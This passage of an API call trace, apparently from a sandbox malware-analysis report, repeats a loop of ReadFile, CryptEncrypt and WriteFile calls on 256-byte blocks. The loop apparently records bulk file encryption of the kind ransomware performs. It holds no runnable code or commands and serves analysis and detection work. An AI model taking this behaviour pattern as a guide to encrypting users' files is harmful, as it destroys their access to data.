lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.263] GetLastError () returned 0x0 [0153.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.263] GetLastError () returned 0x0 [0153.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.263] GetLastError () returned 0x0 [0153.263] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.263] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.264] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.264] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.264] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.264] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.264] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.264] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.264] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.264] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.264] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.264] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.264] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.264] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.264] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.264] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.265] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.265] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.265] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.265] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.265] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.265] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.265] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.265] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.265] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.265] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.265] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.265] GetLastError () returned 0x0 [0153.265] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.266] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.266] GetLastError () returned 0x0 [0153.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.266] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.266] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.266] GetLastError () returned 0x0 [0153.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.266] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.266] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.266] GetLastError () returned 0x0 [0153.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.266] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.266] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.266] GetLastError () returned 0x0 [0153.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.266] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.266] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.266] GetLastError () returned 0x0 [0153.266] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.266] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.266] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.266] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.267] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.267] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.267] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.267] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.267] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.267] GetLastError () returned 0x0 [0153.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.268] GetLastError () returned 0x0 [0153.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.268] GetLastError () returned 0x0 [0153.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.268] GetLastError () returned 0x0 [0153.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.268] GetLastError () returned 0x0 [0153.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.268] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, 